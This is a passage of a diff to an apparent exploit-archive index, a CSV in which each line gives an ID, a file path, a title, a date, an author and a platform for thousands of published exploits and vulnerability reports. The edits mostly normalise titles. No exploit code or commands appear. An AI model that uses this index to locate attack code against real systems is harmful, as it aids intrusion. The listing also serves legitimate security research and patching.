+30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.php ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x work/work.php display_upload_form Action origin Parameter XSS",2007-12-22,Doz,php,webapps,0 @@ -27871,7 +27872,7 @@ id,file,description,date,author,platform,type,port 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 - wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 -30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 +30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.php Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection Weakness",2008-01-03,MustLive,php,webapps,0 30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30984,platforms/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps,0 @@ -28381,7 +28382,7 @@ id,file,description,date,author,platform,type,port 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID param) SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 -31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 +31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution",2014-02-07,metasploit,hardware,remote,0 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 @@ -28869,7 +28870,7 @@ id,file,description,date,author,platform,type,port 32018,platforms/linux/dos/32018.txt,"Multiple Vendors Unspecified SVG File Processing - Denial of Service Vulnerability",2008-07-08,"Kristian Hermansen",linux,dos,0 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat 'psxstr.c' STR Data Heap Based Buffer Overflow Vulnerability",2008-07-09,astrange,linux,dos,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 -32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - 'index.php' HTML Injection and Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 +32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - 'index.php' HTML Injection / Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 index.php Multiple Parameter XSS",2008-07-09,"Julian Rodriguez",php,webapps,0 32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 login.php Multiple Parameter XSS",2008-07-09,"Julian Rodriguez",php,webapps,0 32024,platforms/php/webapps/32024.txt,"V-webmail 1.6.4 - includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 @@ -30207,7 +30208,7 @@ id,file,description,date,author,platform,type,port 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation (x64)",2014-05-26,"Matthew Daley",linux,local,0 -33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 +33518,platforms/hardware/webapps/33518.txt,"ZyXEL P-660HW-T1 3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855 @@ -30219,7 +30220,7 @@ id,file,description,date,author,platform,type,port 33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0 33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0 33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service Vulnerability",2010-01-14,"Hellcode Research",linux,dos,0 -33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 +33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Parameter Cross-Site Scripting Vulnerability",2010-01-14,PaL-D3v1L,php,webapps,0 33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 - 'ibmdiradm' Null Pointer Dereference Denial of Service Vulnerability",2006-04-01,Intevydis,unix,dos,0 33528,platforms/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Parameter Cross-Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0 @@ -30357,7 +30358,7 @@ id,file,description,date,author,platform,type,port 33707,platforms/windows/dos/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,dos,0 33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 -33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 and 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 +33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 @@ -30701,7 +30702,7 @@ id,file,description,date,author,platform,type,port 34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross-Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80 -34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 +34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script 0 SQL Injection / Cross-Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass Vulnerability",2010-06-02,Septemb0x,php,webapps,0 34078,platforms/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting Vulnerability",2010-06-02,Red-D3v1L,php,webapps,0 @@ -30713,7 +30714,7 @@ id,file,description,date,author,platform,type,port 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for WordPress - Cross-Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0 34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross-Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 -34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0 +34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple XSS Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0 34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross-Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 @@ -30735,7 +30736,7 @@ id,file,description,date,author,platform,type,port 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0 -34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0 +34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0 34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80 34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 @@ -30918,7 +30919,7 @@ id,file,description,date,author,platform,type,port 34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross-Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0 34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting Vulnerability",2009-12-13,loneferret,php,webapps,0 -34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting and Authentication Bypass Vulnerabilities",2009-12-13,bi0,php,webapps,0 +34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass Vulnerabilities",2009-12-13,bi0,php,webapps,0 34319,platforms/php/webapps/34319.txt,"Ez Cart 'index.php' Cross-Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0 34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities",2010-07-15,"Nijel the Destroyer",php,webapps,0 @@ -31033,7 +31034,7 @@ id,file,description,date,author,platform,type,port 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 -34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 +34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0 34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0 34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0 @@ -31413,7 +31414,7 @@ id,file,description,date,author,platform,type,port 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0 -34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Shellshock Exploit",2014-10-04,"hobbily plunt",linux,remote,0 +34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0 34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0 @@ -31429,7 +31430,7 @@ id,file,description,date,author,platform,type,port 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 -34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0 +34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0 @@ -31450,7 +31451,7 @@ id,file,description,date,author,platform,type,port 34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/rule method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/user method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 -34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 +34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 / 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 @@ -31568,7 +31569,7 @@ id,file,description,date,author,platform,type,port 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0 -35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 +35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 @@ -31661,7 +31662,7 @@ id,file,description,date,author,platform,type,port 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0 -35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 +35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 @@ -31721,7 +31722,7 @@ id,file,description,date,author,platform,type,port 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate param) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 -35216,platforms/windows/local/35216.py,"Microsoft Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 +35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 @@ -31892,7 +31893,7 @@ id,file,description,date,author,platform,type,port 35405,platforms/php/webapps/35405.txt,"VidiScript 'vp' Parameter Cross-Site Scripting Vulnerability",2011-03-02,NassRawI,php,webapps,0 35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting Vulnerability",2011-03-03,"AutoSec Tools",php,webapps,0 -35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 +35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0 @@ -32088,7 +32089,7 @@ id,file,description,date,author,platform,type,port 35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module 'id' Parameter SQL Injection Vulnerability",2011-04-15,KedAns-Dz,php,webapps,0 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Include and SQL Injection Vulnerabilities",2011-04-15,KedAns-Dz,php,webapps,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting Vulnerability",2011-04-15,"Edgard Chammas",hardware,remote,0 -35621,platforms/php/webapps/35621.txt,"4images 1.7.9 - Multiple Remote File Include and SQL Injection Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 +35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Include and SQL Injection Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service Vulnerability",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 & 2.3.0 CMS - SQL Injection Vulnerability",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"PHPLIST 3.0.6 & 3.0.10 - SQL Injection Vulnerability",2014-12-27,Vulnerability-Lab,php,webapps,0 @@ -32909,7 +32910,7 @@ id,file,description,date,author,platform,type,port 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 'status' Parameter SQL Injection Vulnerability",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross Site Scripting Vulnerability",2011-12-29,SiteWatch,php,webapps,0 36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting Vulnerability",2012-01-04,sonyy,php,webapps,0 -36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 +36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 @@ -33046,9 +33047,9 @@ id,file,description,date,author,platform,type,port 36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload Vulnerability",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple Remote SQL Injection Vulnerabilities",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36643,platforms/php/webapps/36643.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 -36644,platforms/php/webapps/36644.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0 -36645,platforms/php/webapps/36645.txt,"4images 1.7.10 admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 +36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 +36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0 +36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection Vulnerability",2012-01-28,the_cyber_nuxbie,php,webapps,0 36647,platforms/php/webapps/36647.txt,"Lead Capture 'login.php' Script Cross Site Scripting Vulnerability",2012-01-21,HashoR,php,webapps,0 36648,platforms/php/webapps/36648.txt,"OpenEMR <= 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 @@ -33320,7 +33321,7 @@ id,file,description,date,author,platform,type,port 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection 